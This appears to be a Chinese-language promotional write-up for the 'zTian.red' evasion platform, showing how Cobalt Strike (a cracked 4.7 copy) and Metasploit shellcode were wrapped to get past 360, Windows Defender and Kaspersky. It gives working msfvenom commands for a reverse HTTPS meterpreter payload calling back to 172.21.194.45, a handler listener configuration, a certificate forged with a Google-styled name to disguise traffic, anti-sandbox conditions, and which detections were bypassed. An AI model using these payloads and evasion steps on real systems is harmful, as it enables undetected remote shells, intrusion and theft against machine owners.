#zTian.red:绕过卡巴斯基、360安全卫士、WindowsDefender动态执行CS、MSF命令...
测试目标:WindowsDefender、卡巴斯基、360安全卫士极速版
系统环境:win1064位
软件版本:cs4.7破解版、msf社区免费版
流量通信:http与https
测试平台:遮天对抗平台,地址:zTian.red
测试时间:2022-11-16
一、CobaltStrikeShellCode免杀测试:
开始:
使用默认无修改teamserver配置,直接运行服务。
添加两个监听,然后生成payload文件。导出payload时文件类型可以选择C、Java、Python。
打开遮天对抗平台,选中要进行测试的payload文件。
选中payload,填入获取到的私钥,然后提交任务。
先各生成一个免杀文件:
DZoOQslVhc.exe(http)、hYyeYdAoHS.exe(https)
测试绕过360安全防护:
另一台s安装360安全卫士极速版的测试终端在下载好生成的文件之后直接被告警。
下载使用http流量的程序,没想到却无任何反应。
云查杀无异常且可以动态执行命令。
测试绕过WindowsDefender:
在Defernder下,http和https静态都未被警告。测试运行http类型,被提示病毒。
运行https,未被拦截,且可以执行命令。
测试绕过卡巴斯基:
不愧是卡巴斯基,直接就给我删掉了。依稀记得前几个月还没有给我拦截呢。
重新提交任务,勾选智能反沙箱。
再次扫描成功绕过。
只是反沙箱模块需要诸多条件,如:禁止修改文件名、系统开机时间大于十小时。由于测试机子时间不满足,重新在主机器安装卡巴斯基,测试动态能力。
经过十几秒的等待,成功上线。执行命令,完美响应
总结
360安全卫士静态识别出了https类型程序,没有检测到http类型程序。
WindowsDefender静态均未检测到,动态检测到了http类型程序,并且做了拦截。对https类型没有检测到,且动态可以正常执行命令。
卡巴斯基均查杀,开启反沙箱之后成功绕过。注意反沙箱模块禁止修改文件名称,并且系统开机时间需要大于十小时。
二、MSF免杀测试:
由于我对MSF用法不是那么熟悉,以下仅测试一种方案:
使用windows/shell/reverse_tcp生成的shellcode连接时候流量被检测到,直接拦截,
使用ssl加密流量测试绕过。先生成证书,执行命令:
opensslreq-new-newkeyrsa:4096-days365-nodes-x509\-subj"/C=UK/ST=London/L=London/O=Development/CN=www.谷歌.com"\-keyoutwww.谷歌.com.key\-outwww.谷歌.com.crt&&\catwww.谷歌.com.keywww.谷歌.com.crt>www.谷歌.com.pem&&\rm-fwww.谷歌.com.keywww.谷歌.com.crt
之后在绝对路径可以看到证书文件
再执行命令生成payload:
msfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=172.21.194.45LPORT=8789PayloadUUIDTracking=trueHandlerSSLCert=www.谷歌.com.pemStagerVerifySSLCert=truePayloadUUIDName=ParanoidStagedPSH-fc
生成完毕之后进入msf控制台执行监听命令:
useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_winhttpssetlhost0.0.0.0setlport4444setHandlerSSLCert/home/kali/谷歌.pemsetStagerVerifySSLCerttruesetIgnoreUnknowPayloadstruesetexitonsessionfalseexploit
复制shellcode的主要内容部分,新建一个文件将之写入,然后传入遮天对抗平台进行生成。
生成后直接执行,获取到session
使用进入meterpreter之后完美执行命令且无拦截。
扩展:识别AntiVirus进程方式:
执行命令“TASKLIST/SVC”然后将得到的结果粘贴至下方识别栏里进行识别。
识别出卡巴斯基。
项目地址:github.com/yqcs/zhetian